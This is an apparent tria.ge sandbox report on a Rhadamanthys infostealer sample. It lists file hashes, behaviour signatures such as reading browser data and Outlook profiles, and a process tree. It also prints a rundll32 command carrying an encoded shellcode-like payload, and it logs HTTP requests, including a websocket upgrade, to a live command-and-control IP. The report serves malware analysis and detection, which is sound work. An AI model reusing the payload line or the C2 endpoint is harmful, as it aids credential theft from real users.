Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    91s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/02/2023, 21:21 UTC

General

  • Target

    a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe

  • Size

    248KB

  • MD5

    dd70d6f65ac9130bad2fa6e1d212b8c1

  • SHA1

    1efd5dbfe68f298292b3c74aa121dc1249bd7528

  • SHA256

    a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee

  • SHA512

    4a6771a0d400547d432ae461d5700307d3cee2e09377ac8f621a015f15c86e546f85b050700906a3a133d60b117968529bcfccc553afba754e10c769e9ceef78

  • SSDEEP

    3072:FPP4OHwhsjezkNL959WwM95NueH39TBxLTEEIFBP1kuu5r:RP4cnj2GL/9PeX9lxLAEIFguu5

Malware Config

Signatures

  • Detect rhadamanthys stealer shellcode 2 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe
    "C:\Users\Admin\AppData\Local\Temp\a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4800
    • C:\Windows\system32\rundll32.exe
      "C:\Users\Admin\AppData\Roaming\nsis_unse567b9d.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8GT|AG0AagBzADf7ADQfAFQAegBMuwB1TwBJAEQtAln|SIPsKOgEAgD|AEiDxCjDzMz|zEyJRCQYSIn|VCQQSIlMJAj+XQFIi0QkMEiJ2wQkgQE4SG8ACEhvx0QkEC0B6w6BAV8QSIPAAY8BEIEBt0BIOZYAcyWfA4v|DCRIA8hIi8HXSItMqwFUewAD0f9Ii8qKCYgI6|3BZgVlSIsEJWD+8|AzyUiLUBhI|zvRdDZIg8Ig|0iLAkg7wnQq|2aDeEgYdRpM|4tAUGZBgzhru3QHERFLdQgREHj|EC50BUiLAOuv1UiLSP0AwWoAQP9TVVZXQVRBVe9BVkFXXQFmgTn|TVpNi|hMi|K|SIvZD4X88|BM|2NJPEGBPAlQv0UAAA+F6vPwQe+LhAmI8|CFwEi|jTwBD4TWahGDd7wJjC0BD4TH8|D|RItnIESLXxz|i3ckRItPGEz|A+FMA9lIA|H|M8lFhckPhKT+8|BNi8RBixBF|zPSSAPTigKE|8B0HUHByg0Pe77A+gABRAPQvxH|dexBgfqq|A3|fHQOg8EBSYP|wARBO8lzaev|xovBD7cMTkX|iyyLTAPrdFj7M+2qEHRRQYsU|sEA0zPJigJMi9|C6w|BycgRA8je5RABQYoA1RDtM3|AM|ZBOwy24BD+pgCDxgGD+Ahy|+7rCkiLy0H|f9VJiQT3g8XkEH|EBDtvGHKvZgH|QV9BXkFdQVzvX15dWzMXSIHs+2ABZACL6ehm|v|||0iFwA+EmNZ1IEyNrwGLKxDIM|f|6Jt9II1fBEz|jUVGM9KLy||3VCRogCBMi+AP64RrdSBFqBAzwIt905EgSIl8JCCmIP1wgCBIi|APhEv8dSCmIFBIjVYIRH+NR0BIjYwkhRG|SIvY6Hz9fiCNq1ZI3iAQ4iHM8|Do|WfvIESLBo1XCPRBIKYgWMohiYQkgNqHEt7z8IsO2iBYiWOMJHERBzCRIOgx7yD7i5wtMkyLXTpI74P7bEiKIDBMib9kJDhMi6QaMky7iVyEAYQk3IcRhu2SjRGNR0swjCTwfvPwSYvU6On8BTC7ipx4MkiNhHgyQf+A8yGNT2xEMP0YpAKD6QF184H9vHgyIVJleHVN74uEJPQiMZQk+P41AcJIO9hyOIP|+mx2M0SNSUCe+gCUQbgAmACmIECeyiL4dBlEtjDAMUnvjVQkbJEgSYPod2zoa4IwSIvOpiD|eEiF|3QSi1XzQkyOMBsxSI1MJD9A|9dIgcR0IWEkAC0ILQE=
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Accesses Microsoft Outlook profiles
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • outlook_office_path
      • outlook_win_path
      PID:2536
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2536 -s 280
        3⤵
        • Program crash
        PID:3756
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 708
      2⤵
      • Program crash
      PID:1972
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4800 -ip 4800
    1⤵
      PID:3508
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 468 -p 2536 -ip 2536
      1⤵
        PID:3528

      Network

      • flag-it
        GET
        http://179.43.154.216/img/logo.jpg
        a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe
        Remote address:
        179.43.154.216:80
        Request
        GET /img/logo.jpg HTTP/1.1
        Host: 179.43.154.216
        User-Agent: curl/5.9
        Connection: close
        X-CSRF-TOKEN: YhId6npNWJD5x8Ue23bivIu4MPjlQKAoTGXHJpNlBk0L6UFOsKpRkw0gtSQ94Z3HUGaWxwNRiiqeipaMftXZiQ==
        Cookie: CSRF-TOKEN=YhId6npNWJD5x8Ue23bivIu4MPjlQKAoTGXHJpNlBk0L6UFOsKpRkw0gtSQ94Z3HUGaWxwNRiiqeipaMftXZiQ==; LANG=en-US
        Response
        HTTP/1.1 200 OK
        Server: openresty
        Date: Sun, 05 Feb 2023 21:21:49 GMT
        Content-Type: image/jpeg
        Content-Length: 929566
        Connection: close
        X-Served-By: 179.43.154.216
      • flag-it
        GET
        http://179.43.154.216/img/logo.jpg
        rundll32.exe
        Remote address:
        179.43.154.216:80
        Request
        GET /img/logo.jpg HTTP/1.1
        Host: 179.43.154.216
        User-Agent: curl/5.9
        Upgrade: websocket
        Connection: upgrade
        Sec-Websocket-Version: 13
        Sec-Websocket-Key: W7Hj1N6MR3WRauE
        Response
        HTTP/1.1 101 Switching Protocols
        Server: openresty
        Date: Sun, 05 Feb 2023 21:21:57 GMT
        Connection: upgrade
        Upgrade: websocket
        Sec-WebSocket-Accept: 81YnpkesBm52K7X0tz0EFlgPPho=
      • 93.184.220.29:80
        322 B
        7
      • 179.43.154.216:80
        http://179.43.154.216/img/logo.jpg
        http
        a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe
        21.4kB
        957.4kB
        433
        690

        HTTP Request

        GET http://179.43.154.216/img/logo.jpg

        HTTP Response

        200
      • 179.43.154.216:80
        http://179.43.154.216/img/logo.jpg
        http
        rundll32.exe
        75.2kB
        2.7kB
        66
        38

        HTTP Request

        GET http://179.43.154.216/img/logo.jpg

        HTTP Response

        101
      • 8.248.99.254:80
        322 B
        7
      • 8.248.99.254:80
        322 B
        7
      • 8.248.99.254:80
        322 B
        7
      • 104.80.225.205:443
        322 B
        7
      • 20.189.173.7:443
        322 B
        7
      • 8.248.99.254:80
        322 B
        7
      • 8.248.99.254:80
        322 B
        7
      • 8.248.99.254:80
        322 B
        7
      No results found

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\nsis_unse567b9d.dll

        Filesize

        49KB

        MD5

        832890fded186835970d1d3302590138

        SHA1

        5385703e9dcde43e60928b2e9c941b7232468a6a

        SHA256

        438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576

        SHA512

        5cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1

      • C:\Users\Admin\AppData\Roaming\nsis_unse567b9d.dll

        Filesize

        49KB

        MD5

        832890fded186835970d1d3302590138

        SHA1

        5385703e9dcde43e60928b2e9c941b7232468a6a

        SHA256

        438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576

        SHA512

        5cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1

      • memory/2536-141-0x00007FF4A4DE0000-0x00007FF4A4EDA000-memory.dmp

        Filesize

        1000KB

      • memory/2536-140-0x0000020B42D50000-0x0000020B42D57000-memory.dmp

        Filesize

        28KB

      • memory/2536-145-0x00007FF4A4DE0000-0x00007FF4A4EDA000-memory.dmp

        Filesize

        1000KB

      • memory/2536-146-0x00007FF9B9480000-0x00007FF9B9492000-memory.dmp

        Filesize

        72KB

      • memory/4800-135-0x0000000002270000-0x000000000228D000-memory.dmp

        Filesize

        116KB

      • memory/4800-136-0x000000000062D000-0x000000000063E000-memory.dmp

        Filesize

        68KB

      • memory/4800-134-0x0000000000400000-0x00000000004AA000-memory.dmp

        Filesize

        680KB

      • memory/4800-133-0x00000000020D0000-0x00000000020F5000-memory.dmp

        Filesize

        148KB

      • memory/4800-132-0x0000000000608000-0x0000000000629000-memory.dmp

        Filesize

        132KB

      • memory/4800-142-0x0000000000608000-0x0000000000629000-memory.dmp

        Filesize

        132KB

      • memory/4800-143-0x0000000002270000-0x000000000228D000-memory.dmp

        Filesize

        116KB

      • memory/4800-144-0x0000000000608000-0x0000000000629000-memory.dmp

        Filesize

        132KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.